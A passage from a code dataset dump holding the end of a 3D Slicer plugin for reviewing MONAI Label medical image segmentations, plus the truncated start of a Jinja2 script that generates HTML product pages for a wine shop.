flagged\n def setCheckBoxesClient(self):\n self.setLoadButtonColor(reload=True)\n self.ui.checkBox_not_segmented.setEnabled(False)\n self.ui.checkBox_segmented.setChecked(True)\n self.ui.checkBox_segmented.setEnabled(False)\n\n # CheckBox: flagged\n def checkedFlagged(self):\n self.setLoadButtonColor(reload=True)\n self.ui.checkBox_segmented.setChecked(True)\n if self.ui.checkBox_approved.isChecked():\n self.ui.checkBox_approved.setChecked(False)\n if self.ui.checkBox_not_segmented.isChecked():\n self.ui.checkBox_not_segmented.setChecked(False)\n\n # CheckBox: approved\n def checkApproved(self):\n self.setLoadButtonColor(reload=True)\n self.ui.checkBox_segmented.setChecked(True)\n if self.ui.checkBox_flagged.isChecked():\n self.ui.checkBox_flagged.setChecked(False)\n if self.ui.checkBox_not_segmented.isChecked():\n self.ui.checkBox_not_segmented.setChecked(False)\n\n # CheckBox: NOT segmented\n def checkNotSegmented(self):\n self.setLoadButtonColor(reload=True)\n if self.ui.checkBox_approved.isChecked():\n self.ui.checkBox_approved.setChecked(False)\n if self.ui.checkBox_flagged.isChecked():\n self.ui.checkBox_flagged.setChecked(False)\n if self.ui.checkBox_segmented.isChecked():\n self.ui.checkBox_segmented.setChecked(False)\n\n # CheckBox: segmented\n def checkSegmented(self):\n self.setLoadButtonColor(reload=True)\n if self.ui.checkBox_segmented.isChecked() is False:\n self.ui.checkBox_approved.setChecked(False)\n self.ui.checkBox_flagged.setChecked(False)\n return\n\n if self.ui.checkBox_not_segmented.isChecked():\n self.ui.checkBox_not_segmented.setChecked(False)\n\n # Section: Search Image\n def cleanSearchSection(self):\n self.ui.tableWidge_imageMeta.setRowCount(0)\n self.ui.tableWidge_imageMeta.clearContents()\n self.ui.textEdit_search.clear()\n\n def search(self):\n \"\"\"\n After triggering search button, load images and segmentation by input ids\n \"\"\"\n self.cleanDicomStreamSection()\n\n if self.ui.textEdit_search.toPlainText() == \"\":\n logging.info(f\"{self.getCurrentTime()}: Search input field is empty\")\n return\n\n idsStr = self.ui.textEdit_search.toPlainText()\n idList = self.getIdsFromString(idsStr)\n\n self.idToimageData = self.logic.getMultImageDataByIds(idList)\n 
self.listImageData = [*self.idToimageData.values()]\n\n foundIdList = [imageData.getName() for imageData in self.listImageData]\n notFoundIdList = [id for id in idList if (id not in foundIdList)]\n self.loadSearchImageMetaInTable(self.listImageData, notFoundIdList)\n\n self.ui.collapsibleButton_dicom_evaluation.enabled = True\n self.setHorizontalSlider(len(foundIdList))\n if len(foundIdList) > 0:\n self.setSearchResultMessage(numOfFound=len(foundIdList))\n self.loadFirstImage()\n else:\n self.setSearchResultMessage(numOfFound=0)\n\n def searchByAnnotatorReviewer(self):\n selectedAnnotator: str = self.ui.comboBox_search_annotator.currentText\n selectedReviewer: str = self.ui.comboBox_search_reviewer.currentText\n isApproved: bool = bool(self.ui.checkBox_search_approved.isChecked())\n isFlagged: bool = bool(self.ui.checkBox_search_flagged.isChecked())\n\n self.idToimageData = self.logic.searchByAnnotatorReviewer(\n selectedAnnotator, selectedReviewer, isApproved, isFlagged\n )\n self.listImageData = [*self.idToimageData.values()]\n\n self.loadSearchImageMetaInTable(self.listImageData, [])\n if len(self.listImageData) > 0:\n self.ui.collapsibleButton_dicom_evaluation.enabled = True\n self.setSearchResultMessage(numOfFound=len(self.idToimageData))\n self.setHorizontalSlider(len(self.idToimageData))\n self.loadFirstImage()\n else:\n self.setSearchResultMessage(numOfFound=0)\n\n def searchByLevel(self):\n isEasy: bool = bool(self.ui.checkBox_search_easy.isChecked())\n isMedium: bool = bool(self.ui.checkBox_search_medium.isChecked())\n isHard: bool = bool(self.ui.checkBox_search_hard.isChecked())\n\n self.idToimageData = self.logic.searchByLevel(isEasy, isMedium, isHard)\n self.listImageData = [*self.idToimageData.values()]\n\n self.loadSearchImageMetaInTable(self.listImageData, [])\n if len(self.listImageData) > 0:\n self.ui.collapsibleButton_dicom_evaluation.enabled = True\n self.setSearchResultMessage(numOfFound=len(self.idToimageData))\n self.setHorizontalSlider(len(self.idToimageData))\n self.loadFirstImage()\n else:\n self.setSearchResultMessage(numOfFound=0)\n\n def setSearchResultMessage(self, numOfFound: int):\n if numOfFound == 0:\n self.ui.label_search_result.setText(\"Result: No images found.\")\n self.ui.label_search_result.setStyleSheet(\"color: red\")\n else:\n resultMessage = f\"Result: {numOfFound} images found.\"\n self.ui.label_search_result.setText(resultMessage)\n self.ui.label_search_result.setStyleSheet(\"color: green\")\n\n def checkedAppprovedSearch(self):\n isFlagged: bool = bool(self.ui.checkBox_search_flagged.isChecked())\n if isFlagged:\n self.ui.checkBox_search_flagged.setChecked(False)\n\n def checkedFlaggedSearch(self):\n isApproved: bool = bool(self.ui.checkBox_search_approved.isChecked())\n if isApproved:\n self.ui.checkBox_search_approved.setChecked(False)\n\n def loadSearchImageMetaInTable(self, foundlist: List[ImageData], notFoundIdList: List[str]):\n \"\"\"\n Set table content after triggering button \"show\"\n Parameters:\n foundlist (list): list contains found ids\n notFoundIdList (list): list contains not found ids\n \"\"\"\n rowCount = len(foundlist) + len(notFoundIdList)\n self.ui.tableWidge_imageMeta.setRowCount(rowCount)\n rowCounter = 0\n for row, imageData in enumerate(foundlist):\n self.ui.tableWidge_imageMeta.setItem(row, 0, qt.QTableWidgetItem(imageData.getName()))\n self.ui.tableWidge_imageMeta.setItem(row, 1, qt.QTableWidgetItem(\"Yes\"))\n self.ui.tableWidge_imageMeta.setItem(row, 2, qt.QTableWidgetItem(str(imageData.isSegemented())))\n 
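# --- Illustrative aside (not part of the original source file): the table-filling
# loops around this point write one (image id, "found?", "segmented?") triple per
# row. A Qt-free sketch that assembles those display rows first, so the widget
# code only has to iterate (the helper name and the pair-based input format are
# assumptions made for the example):
def build_meta_rows(found_items, not_found_ids):
    """found_items: iterable of (image_id, is_segmented) pairs that resolved;
    not_found_ids: ids the lookup could not resolve."""
    rows = [(image_id, "Yes", str(is_segmented)) for image_id, is_segmented in found_items]
    rows += [(image_id, "No", "No") for image_id in not_found_ids]
    return rows

# Example: build_meta_rows([("img1", True)], ["img9"])
# -> [("img1", "Yes", "True"), ("img9", "No", "No")]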
rowCounter += 1\n\n for row, notFoundId in enumerate(notFoundIdList):\n self.ui.tableWidge_imageMeta.setItem(rowCounter, 0, qt.QTableWidgetItem(notFoundId))\n self.ui.tableWidge_imageMeta.setItem(rowCounter, 1, qt.QTableWidgetItem(\"No\"))\n self.ui.tableWidge_imageMeta.setItem(rowCounter, 2, qt.QTableWidgetItem(\"No\"))\n rowCounter += 1\n\n self.ui.btn_show_image.enabled = True\n\n def loadFirstImage(self):\n self.imageCounter = 0\n self.currentImageData = self.listImageData[self.imageCounter]\n self.loadNextImage(self.currentImageData)\n # self.imageCounter += 1\n self.updateHorizontalSlider()\n\n def showSearchedImage(self):\n \"\"\"\n displays dicom & segmentation to corresponding selected row in listed ids\n \"\"\"\n selectedRow = self.ui.tableWidge_imageMeta.currentRow()\n if selectedRow == -1:\n return\n selectedImageId = self.ui.tableWidge_imageMeta.item(selectedRow, 0).text()\n\n if selectedImageId not in self.idToimageData:\n logging.info(f\"{self.getCurrentTime()}: Selected image id [id = {selectedImageId}] was not found\")\n return\n self.currentImageData = self.idToimageData[selectedImageId]\n self.loadNextImage(self.currentImageData)\n\n def removeAllWhiteSpaces(self, strChain) -> str:\n \"\"\"\n removes white spaces within string\n \"\"\"\n pattern = r\"\\s+\"\n return re.sub(pattern, \"\", strChain)\n\n def getIdsFromString(self, idStr: str) -> List[str]:\n \"\"\"\n parses string which contains comma seperated ids\n Parameters:\n idStr (str): string which contains comma seperated ids\n Returns:\n list: contains ids\n \"\"\"\n cleanedStr = self.removeAllWhiteSpaces(idStr)\n idsList = cleanedStr.split(\",\")\n return list(dict.fromkeys(idsList)) # remove all duplicates\n\n # Section: Dicom stream\n # Button: Approve\n def approveSegmentation(self):\n statusApproved = self.ui.btn_approved.isChecked()\n statusFlagged = self.ui.btn_mark_revision.isChecked()\n\n if statusFlagged or self.finalStatus == self.STATUS.FLAGGED:\n self.ui.btn_mark_revision.setChecked(False)\n self.ui.btn_mark_revision.setDown(False)\n if statusApproved:\n self.finalStatus = self.STATUS.APPROVED\n self.ui.btn_approved.setChecked(True)\n else:\n self.finalStatus = \"\"\n self.updateDisplayImageMetaData()\n\n # Button: Flagge\n def flagSegmentation(self):\n statusApproved = self.ui.btn_approved.isChecked()\n statusFlagged = self.ui.btn_mark_revision.isChecked()\n\n if statusApproved or self.finalStatus == self.STATUS.APPROVED:\n self.ui.btn_approved.setChecked(False)\n self.ui.btn_approved.setDown(False)\n if statusFlagged:\n self.finalStatus = self.STATUS.FLAGGED\n self.ui.btn_mark_revision.setChecked(True)\n else:\n self.finalStatus = \"\"\n self.updateDisplayImageMetaData()\n\n # Button: Clear\n def clearButtons(self):\n self.ui.btn_mark_revision.setChecked(False)\n self.ui.btn_approved.setChecked(False)\n\n self.ui.btn_mark_revision.setDown(False)\n self.ui.btn_approved.setDown(False)\n\n self.ui.btn_easy.setChecked(False)\n self.ui.btn_medium.setChecked(False)\n self.ui.btn_hard.setChecked(False)\n\n self.ui.btn_easy.setDown(False)\n self.ui.btn_medium.setDown(False)\n self.ui.btn_hard.setDown(False)\n\n def disableButtons(self):\n self.ui.btn_easy.setDown(False)\n self.ui.btn_medium.setDown(False)\n self.ui.btn_hard.setDown(False)\n\n # Button: Easy\n def setEasy(self):\n levelEasy = self.ui.btn_easy.isChecked()\n levelMedium = self.ui.btn_medium.isChecked()\n levelHard = self.ui.btn_hard.isChecked()\n\n if levelEasy:\n self.finalLevel = self.LEVEL.EASY\n\n if levelEasy is False and self.finalLevel 
== self.LEVEL.EASY:\n self.finalLevel = \"\"\n\n if levelMedium or levelHard or (self.finalLevel == self.LEVEL.HARD) or (self.finalLevel == self.LEVEL.MEDIUM):\n\n self.ui.btn_medium.setChecked(False)\n self.ui.btn_hard.setChecked(False)\n self.ui.btn_medium.setDown(False)\n self.ui.btn_hard.setDown(False)\n\n self.updateDisplayImageMetaData()\n\n # Button: Medium\n def setMedium(self):\n levelEasy = self.ui.btn_easy.isChecked()\n levelMedium = self.ui.btn_medium.isChecked()\n levelHard = self.ui.btn_hard.isChecked()\n\n if levelMedium:\n self.finalLevel = self.LEVEL.MEDIUM\n\n if levelMedium is False and self.finalLevel == self.LEVEL.MEDIUM:\n self.finalLevel = \"\"\n\n if levelEasy or levelHard or (self.finalLevel == self.LEVEL.HARD) or (self.finalLevel == self.LEVEL.EASY):\n\n self.ui.btn_easy.setChecked(False)\n self.ui.btn_hard.setChecked(False)\n self.ui.btn_easy.setDown(False)\n self.ui.btn_hard.setDown(False)\n\n self.updateDisplayImageMetaData()\n\n # Button: Hard\n def setHard(self):\n levelEasy = self.ui.btn_easy.isChecked()\n levelMedium = self.ui.btn_medium.isChecked()\n levelHard = self.ui.btn_hard.isChecked()\n\n if levelHard:\n self.finalLevel = self.LEVEL.HARD\n\n if levelHard is False and self.finalLevel == self.LEVEL.HARD:\n self.finalLevel = \"\"\n\n if levelEasy or levelMedium or (self.finalLevel == self.LEVEL.MEDIUM) or (self.finalLevel == self.LEVEL.EASY):\n\n self.ui.btn_easy.setChecked(False)\n self.ui.btn_medium.setChecked(False)\n self.ui.btn_easy.setDown(False)\n self.ui.btn_medium.setDown(False)\n\n self.updateDisplayImageMetaData()\n\n # Button: Next\n def getNextSegmentation(self):\n \"\"\"\n after triggering next button:\n 1. persist meta data in monai server\n 2. update progess bar\n 3. load next dicom & segmentation\n \"\"\"\n\n # Persist MetaData\n self.persistMetaInMonaiServer()\n\n # Request Next Image\n self.imageCounter += 1\n\n if self.imageCounter >= len(self.listImageData):\n message = f\"{self.getCurrentTime()}: End of list has been reached.\"\n slicer.util.warningDisplay(message)\n self.imageCounter = len(self.listImageData) - 1\n return\n self.updateHorizontalSlider()\n self.currentImageData = self.listImageData[self.imageCounter]\n\n # Displays Next Image\n self.loadNextImage(self.currentImageData)\n\n # Monai Server: Put\n def persistMetaInMonaiServer(self):\n \"\"\"\n Sends the updated meta data of dicom and segmentation to monai-server\n Monai-server incorporates that information into datastore.json file\n \"\"\"\n updatedMetaJson = self.updateImageData()\n imageId = self.currentImageData.getName()\n logging.info(\"updatedMetaJson\")\n logging.info(updatedMetaJson)\n if updatedMetaJson == \"\":\n return\n self.logic.updateLabelInfo(imageId, updatedMetaJson)\n\n def updateImageData(self) -> str:\n \"\"\"\n update meta data in information box\n Returns:\n jsonStr (str): json dictionary which is transformed string\n contains updated meta data\n \"\"\"\n self.finalComment = self.ui.plainText_comment.toPlainText()\n\n logging.info(\"Status: \" + self.finalLevel)\n if self.currentImageData.isEqualSegmentationMeta(\n status=self.finalStatus, level=self.finalLevel, approvedBy=self.selectedReviewer, comment=self.finalComment\n ):\n logging.info(f\"{self.getCurrentTime()}: No changes for image (id='{self.currentImageData.getName()}')\")\n return \"\"\n\n self.currentImageData.updateSegmentationMeta(\n status=self.finalStatus, level=self.finalLevel, approvedBy=self.selectedReviewer, comment=self.finalComment\n )\n jsonStr = 
self.currentImageData.getMeta()\n\n if jsonStr is None:\n logging.info(f\"{self.getCurrentTime()}: No update for Image (id='{self.currentImageData.getName()}')\")\n return \"\"\n logging.info(f\"{self.getCurrentTime()}: Successfully updated Image (id='{self.currentImageData.getName()}')\")\n return jsonStr\n\n # Button: Previouse\n def getPreviousSegmenation(self):\n \"\"\"\n Loads the previous dicom and corresponding segmentation\n after useres tiggers Previous-Button\n \"\"\"\n self.imageCounter -= 1\n if self.imageCounter < 0:\n message = f\"{self.getCurrentTime()}: Lower limit of data set has been reached.\"\n slicer.util.warningDisplay(message)\n self.imageCounter = 0\n return\n self.updateHorizontalSlider()\n self.currentImageData = self.listImageData[self.imageCounter]\n self.loadNextImage(self.currentImageData)\n\n def clearImageData(self):\n self.ui.lineEdit_image_id.setText(\"\")\n self.ui.lineEdit_status.setText(\"\")\n self.ui.lineEdit_segmentator.setText(\"\")\n self.ui.lineEdit_level.setText(\"\")\n self.ui.lineEdit_date.setText(\"\")\n self.ui.plainText_comment.setPlainText(\"\")\n\n def displayImageMetaData(self, imageData):\n \"\"\"\n Displays meta info of dicom and segmentation in the info box on slicer\n\n Parameters:\n imageData (ImageData): Contains meta data (of dicom and segmenation)\n \"\"\"\n self.clearImageData()\n self.clearButtons()\n\n self.ui.lineEdit_image_id.setText(imageData.getName())\n self.ui.lineEdit_segmentator.setText(imageData.getClientId())\n self.ui.lineEdit_date.setText(imageData.getTime())\n\n self.ui.lineEdit_status.setText(imageData.getStatus())\n self.ui.plainText_comment.setPlainText(imageData.getComment())\n\n if imageData.isApproved():\n self.finalStatus = self.STATUS.APPROVED\n self.ui.btn_approved.setChecked(True)\n self.ui.btn_approved.setDown(True)\n\n if imageData.isFlagged():\n self.finalStatus = self.STATUS.FLAGGED\n self.ui.btn_mark_revision.setChecked(True)\n self.ui.btn_mark_revision.setDown(True)\n\n if imageData.getLevel() != \"\":\n self.finalLevel = imageData.getLevel()\n if self.finalLevel == self.LEVEL.EASY:\n self.ui.btn_easy.setDown(True)\n self.ui.btn_easy.setChecked(True)\n self.setEasy()\n if self.finalLevel == self.LEVEL.MEDIUM:\n self.ui.btn_medium.setDown(True)\n self.ui.btn_medium.setChecked(True)\n self.setMedium()\n if self.finalLevel == self.LEVEL.HARD:\n self.ui.btn_hard.setDown(True)\n self.ui.btn_hard.setChecked(True)\n self.setHard()\n self.ui.lineEdit_level.setText(imageData.getLevel())\n\n def updateDisplayImageMetaData(self):\n \"\"\"\n Displays updated level (easy, medium, hard)\n in the info box on slicer\n \"\"\"\n self.ui.lineEdit_status.setText(self.finalStatus)\n self.ui.lineEdit_level.setText(self.finalLevel)\n\n def loadNextImage(self, imageData):\n \"\"\"\n Loads original Dicom image and Segmentation into slicer window\n Parameters:\n imageData (ImageData): Contains meta data (of dicom and segmenation)\n which is required for rest request to monai server\n in order to get dicom and segmenation (.nrrd).\n \"\"\"\n slicer.mrmlScene.Clear()\n self.finalStatus = \"\"\n self.finalLevel = \"\"\n self.finalComment = \"\"\n\n self.clearButtons()\n self.displayImageMetaData(imageData)\n self.logic.loadDicomAndSegmentation(imageData)\n\n if imageData.getStatus() != self.STATUS.NOT_SEGMENTED:\n self.displayLabelOfSegmentation()\n\n # Section: Display label\n def addSegmentator(self):\n self.segmentEditorWidget.setMasterVolumeNodeSelectorVisible(False)\n 
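# --- Illustrative aside (not part of the original source file): updateImageData()
# above only pushes an update when a reviewed field actually changed
# (isEqualSegmentationMeta acts as a dirty check before the server round-trip).
# The same idea as a tiny standalone helper operating on plain dicts (name and
# signature are hypothetical, for illustration only):
def needs_update(stored_meta, status, level, approved_by, comment):
    """Return True only if at least one reviewed field differs from storage."""
    proposed = {"status": status, "level": level,
                "approvedBy": approved_by, "comment": comment}
    return any(stored_meta.get(key) != value for key, value in proposed.items())

# Example: needs_update({"status": "approved"}, "approved", "", "", "") is True,
# because level/approvedBy/comment are absent from the stored dict.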
self.segmentEditorWidget.setSegmentationNodeSelectorVisible(False)\n self.segmentEditorWidget.setSwitchToSegmentationsButtonVisible(False)\n\n self.segmentEditorWidget.setMRMLScene(slicer.mrmlScene)\n self.segmentEditorWidget.unorderedEffectsVisible = False\n self.segmentEditorWidget.setReadOnly(True)\n self.segmentEditorWidget.setEffectNameOrder([])\n\n def displayLabelOfSegmentation(self):\n self.selectParameterNode()\n self.getDefaultMasterVolumeNodeID()\n self.segmentEditorWidget.SegmentationNodeComboBox.setCurrentNodeIndex(0)\n self.segmentEditorWidget.MasterVolumeNodeComboBox.setCurrentNodeIndex(0)\n\n def selectParameterNode(self):\n # Select parameter set node if one is found in the scene, and create one otherwise\n segmentEditorSingletonTag = \"SegmentEditor\"\n segmentEditorNode = slicer.mrmlScene.GetSingletonNode(segmentEditorSingletonTag, \"vtkMRMLSegmentEditorNode\")\n if segmentEditorNode is None:\n segmentEditorNode = slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLSegmentEditorNode\")\n segmentEditorNode.UnRegister(None)\n segmentEditorNode.SetSingletonTag(segmentEditorSingletonTag)\n segmentEditorNode = slicer.mrmlScene.AddNode(segmentEditorNode)\n self.segmentEditorWidget.setMRMLSegmentEditorNode(segmentEditorNode)\n\n def getDefaultMasterVolumeNodeID(self):\n layoutManager = slicer.app.layoutManager()\n firstForegroundVolumeID = None\n # Use first background volume node in any of the displayed layouts.\n # If no beackground volume node is in any slice view then use the first\n # foreground volume node.\n for sliceViewName in layoutManager.sliceViewNames():\n sliceWidget = layoutManager.sliceWidget(sliceViewName)\n if not sliceWidget:\n continue\n compositeNode = sliceWidget.mrmlSliceCompositeNode()\n if compositeNode.GetBackgroundVolumeID():\n return compositeNode.GetBackgroundVolumeID()\n if compositeNode.GetForegroundVolumeID() and not firstForegroundVolumeID:\n firstForegroundVolumeID = compositeNode.GetForegroundVolumeID()\n # No background volume was found, so use the foreground volume (if any was found)\n return firstForegroundVolumeID\n\n\nclass MONAILabelReviewerLogic(ScriptedLoadableModuleLogic):\n \"\"\"This class should implement all the actual\n computation done by module. The interface\n should be such that other python code can import\n this class and make use of the functionality without\n requiring an instance of the Widget.\n Uses ScriptedLoadableModuleLogic base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Called when the logic class is instantiated. 
Can be used for initializing member variables.\n \"\"\"\n ScriptedLoadableModuleLogic.__init__(self)\n self.temp_dir = None\n\n self.imageDataController: ImageDataController = ImageDataController()\n\n # Section: Server\n def getServerUrl(self) -> str:\n return self.imageDataController.getServerUrl()\n\n def getCurrentTime(self) -> datetime:\n return datetime.datetime.now()\n\n def connectToMonaiServer(self, serverUrl: str) -> bool:\n return self.imageDataController.connectToMonaiServer(serverUrl)\n\n def getMapIdToImageData(self) -> Dict[str, ImageData]:\n \"\"\"\n Returns dictionary (Dict[str:ImageData]) which maps id to Imagedata-object\n \"\"\"\n return self.imageDataController.getMapIdToImageData()\n\n def initMetaDataProcessing(self) -> bool:\n return self.imageDataController.initMetaDataProcessing()\n\n def getStatistics(self) -> dict:\n return self.imageDataController.getStatistics()\n\n def getClientIds(self) -> List[str]:\n return self.imageDataController.getClientIds()\n\n def getReviewers(self) -> List[str]:\n return self.imageDataController.getReviewers()\n\n # Section: Loading images\n def getAllImageData(self, segmented, isNotSegmented, isApproved, isFlagged) -> List[ImageData]:\n return self.imageDataController.getAllImageData(segmented, isNotSegmented, isApproved, isFlagged)\n\n def getImageDataByClientId(self, selectedClientId, isApproved, isFlagged) -> List[ImageData]:\n return self.imageDataController.getImageDataByClientId(selectedClientId, isApproved, isFlagged)\n\n def getPercentageApproved(self, selectedClientId):\n percentageApprovedOfClient, idxApprovedOfClient = self.imageDataController.getPercentageApproved(\n selectedClientId\n )\n return percentageApprovedOfClient, idxApprovedOfClient\n\n def getPercentageSemgmentedByClient(self, selectedClientId):\n percentageSemgmentedByClient, idxSegmentedByClient = self.imageDataController.getPercentageSemgmentedByClient(\n selectedClientId\n )\n return percentageSemgmentedByClient, idxSegmentedByClient\n\n # Section: Search Image\n def getMultImageDataByIds(self, idList) -> Dict[str, ImageData]:\n return self.imageDataController.getMultImageDataByIds(idList)\n\n def searchByAnnotatorReviewer(\n self, selectedAnnotator: str, selectedReviewer: str, isApproved: bool, isFlagged: bool\n ) -> Dict[str, ImageData]:\n return self.imageDataController.searchByAnnotatorReviewer(\n selectedAnnotator, selectedReviewer, isApproved, isFlagged\n )\n\n def searchByLevel(self, isEasy: bool, isMedium: bool, isHard: bool) -> Dict[str, ImageData]:\n return self.imageDataController.getImageDataByLevel(isEasy=isEasy, isMedium=isMedium, isHard=isHard)\n\n # Section: Dicom stream\n def updateLabelInfo(self, imageId, updatedMetaJson):\n self.imageDataController.updateLabelInfo(imageId, updatedMetaJson)\n\n def loadDicomAndSegmentation(self, imageData):\n \"\"\"\n Loads original Dicom image and Segmentation into slicer window\n Parameters:\n imageData (ImageData): Contains meta data (of dicom and segmenation)\n which is required for rest request to monai server\n in order to get dicom and segmenation (.nrrd).\n \"\"\"\n # Request dicom\n image_name = imageData.getFileName()\n image_id = imageData.getName()\n node_name = imageData.getNodeName()\n checksum = imageData.getCheckSum()\n logging.info(\n \"{}: Request Data image_name='{}', node_name='{}', image_id='{}', checksum='{}'\".format(\n self.getCurrentTime(), image_name, node_name, image_id, checksum\n )\n )\n\n self.requestDicomImage(image_id, image_name, node_name, checksum)\n 
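# --- Illustrative aside (not part of the original source file): the segmentation
# branch that follows writes the downloaded blob into a temporary directory,
# loads it into the scene, and then deletes the file. The store step in
# isolation, using only the standard library (the helper name is hypothetical):
import os
import tempfile

def store_blob_temporarily(blob, file_name):
    """Write raw bytes into a fresh temporary directory and return the path."""
    temp_dir = tempfile.mkdtemp()
    destination = os.path.join(temp_dir, file_name)
    with open(destination, "wb") as handle:
        handle.write(blob)
    return destination

# The caller is expected to os.remove(destination) once the file has been
# consumed, mirroring the clean-up done after displaySegmention() below.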
self.setTempFolderDir()\n\n # Request segmentation\n if imageData.isSegemented():\n segmentationFileName = imageData.getSegmentationFileName()\n img_blob = self.imageDataController.reuqestSegmentation(image_id)\n destination = self.storeSegmentation(img_blob, segmentationFileName, self.temp_dir.name)\n self.displaySegmention(destination)\n os.remove(destination)\n logging.info(f\"{self.getCurrentTime()}: Removed file at {destination}\")\n\n def storeSegmentation(\n self, response: requests.models.Response, segmentationFileName: str, tempDirectory: str\n ) -> str:\n \"\"\"\n stores loaded segmenation temporarily in local directory\n Parameters:\n response (requests.models.Response): contains segmentation data\n image_id (str): image id of segmentation\n \"\"\"\n segmentation = response.content\n destination = self.getPathToStore(segmentationFileName, tempDirectory)\n with open(destination, \"wb\") as img_file:\n img_file.write(segmentation)\n logging.info(f\"{self.getCurrentTime()}: Images is stored in: {destination}\")\n return destination\n\n def getPathToStore(self, segmentationFileName: str, tempDirectory: str) -> str:\n return tempDirectory + \"/\" + segmentationFileName\n\n def displaySegmention(self, destination: str):\n \"\"\"\n Displays the segmentation in slicer window\n \"\"\"\n segmentation = slicer.util.loadSegmentation(destination)\n\n def requestDicomImage(self, image_id: str, image_name: str, node_name: str, checksum: str):\n download_uri = self.imageDataController.getDicomDownloadUri(image_id)\n sampleDataLogic = SampleData.SampleDataLogic()\n _volumeNode = sampleDataLogic.downloadFromURL(\n nodeNames=node_name, fileNames=image_name, uris=download_uri, checksums=checksum\n )[0]\n\n def setTempFolderDir(self):\n \"\"\"\n Create temporary dirctory to store the downloaded segmentation (.nrrd)\n \"\"\"\n if self.temp_dir is None:\n self.temp_dir = tempfile.TemporaryDirectory()\n logging.info(f\"{self.getCurrentTime()}: Temporary Directory: '{self.temp_dir.name}'\")\n\n\nclass MONAILabelReviewerTest(ScriptedLoadableModuleTest):\n \"\"\"\n This is the test case for your scripted module.\n Uses ScriptedLoadableModuleTest base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def setUp(self):\n \"\"\"Do whatever is needed to reset the state - typically a scene clear will be enough.\"\"\"\n slicer.mrmlScene.Clear()\n\n def runTest(self):\n \"\"\"Run as few or as many tests as needed here.\"\"\"\n self.setUp()\n self.test_MONAILabelReviewer1()\n\n def test_MONAILabelReviewer1(self):\n \"\"\"Ideally you should have several levels of tests. At the lowest level\n tests should exercise the functionality of the logic with different inputs\n (both valid and invalid). At higher levels your tests should emulate the\n way the user would interact with your code and confirm that it still works\n the way you intended.\n One of the most important features of the tests is that it should alert other\n developers when their changes will have an impact on the behavior of your\n module. 
For example, if a developer removes a feature that you depend on,\n your test should break so they know that the feature is needed.\n \"\"\"\n\n self.delayDisplay(\"Starting the test\")\n","repo_name":"davgit/MONAILabel","sub_path":"plugins/slicer/MONAILabelReviewer/MONAILabelReviewer.py","file_name":"MONAILabelReviewer.py","file_ext":"py","file_size_in_byte":49467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"40159404135","text":"from collections import Counter\nfrom turtle import title\nfrom typing import List\n\n\nfrom jinja2 import Environment, FileSystemLoader\nfrom tilda_combine.enginie.product_objects import CardObject\n\n\ncard_name_ = 'Cheval'\n\ncard = CardObject('tilda_combine/winetime.sqlite', 'bordeaux', card_name_)\n\ncounter = card.counter()\n\n'''\nЛевый блок с интересными фактами, терруаром, кнопкой\nи особенностями производства\n'''\ncard_name = card.brand\nvintage = card.vintage\nfact = card.fact\nlandscape = card.landscape\nfactory_process = card.factory_process\nbutton_url = card.button_url\nurl = card.url\nvol = card.value\n\n'''\nБлок с таблицей харакетеристик\n'''\nwine = card.wine\ncountry = card.country\nregion = card.region\nsub_region = card.sub_region\nblend = card.blend\nsquare = card.square\nvin_age = card.vin_age\nvalue = card.value\nvol = card.vol\npotential = card.potential\n\n'''\nБлок с оценками и рекомендациями\n'''\ndecanter = card.decanter\ncollection = card.collection\nrp = card.score_rp\nws = card.score_ws\njr = card.score_jr\n\nfrance = 'sss'\n\n\ndef create_html():\n for row in range(counter):\n with open(f'tilda_combine/html_generator/output/{card_name[row].lower().replace(\" \", \"_\")}_{vintage[row]}.html' , 'a') as file:\n print(rp[row])\n if region[row]:\n re_url = f'https://winetime.moscow/shop?tfc_charact:64922[138361030]={region[row]}&tfc_div=:::'\n region_url = [re_url for _ in range(counter)]\n if sub_region[row]:\n sub_url = f'https://winetime.moscow/shop?tfc_charact:66641[138361030]={sub_region[row]}&tfc_div=:::'\n sub_region_url = [sub_url for _ in range(counter)]\n if country[row]:\n co_url = f'https://winetime.moscow/shop?tfc_charact:60386[138361030]={country[row]}&tfc_div=:::'\n country_url = [co_url for _ in range(counter)]\n if int(rp[row]) > 90:\n rp_class = 'rp_green_class'\n else:\n rp_class = 'rp_yellow_class'\n if ws[row]:\n if int(ws[row]) > 90:\n ws_class = 'ws_green_class'\n else:\n ws_class = 'ws_yellow_class'\n else:\n ws_class = ''\n file_loader = FileSystemLoader('')\n env = Environment(loader=file_loader)\n tm = env.get_template('tilda_combine/html_generator/template/tamplate.html')\n msg = tm.render(card_name=card_name[row], vintage=vintage[row], fact=fact[row],\n landscape=landscape[row], factory_process=factory_process[row],\n button_url=button_url[row], country=country[row],\n region=region[row], sub_region=sub_region[row], blend=blend[row],\n square=square[row], vin_age=vin_age[row], value=value[row], vol=vol[row],\n potential=potential[row], wine=wine[row], decanter=decanter[row], rp=rp[row],\n ws=ws[row], jr=jr[row], collection=collection[row], region_url=region_url[row],\n country_url=country_url[row], sub_region_url=sub_region_url[row], rp_class=rp_class,\n ws_class=ws_class)\n file.write(msg)\n file.close()\n\n\ndef create_alt_seo():\n for row in range(counter):\n with open(f'tilda_combine/html_generator/alt_seo_tags/{card_name[row].lower().replace(\" \", \"_\")}.txt', 'a') as file:\n msg = f'{card_name[row]} {vintage[row]} в винотеке WineTime (Москва, 
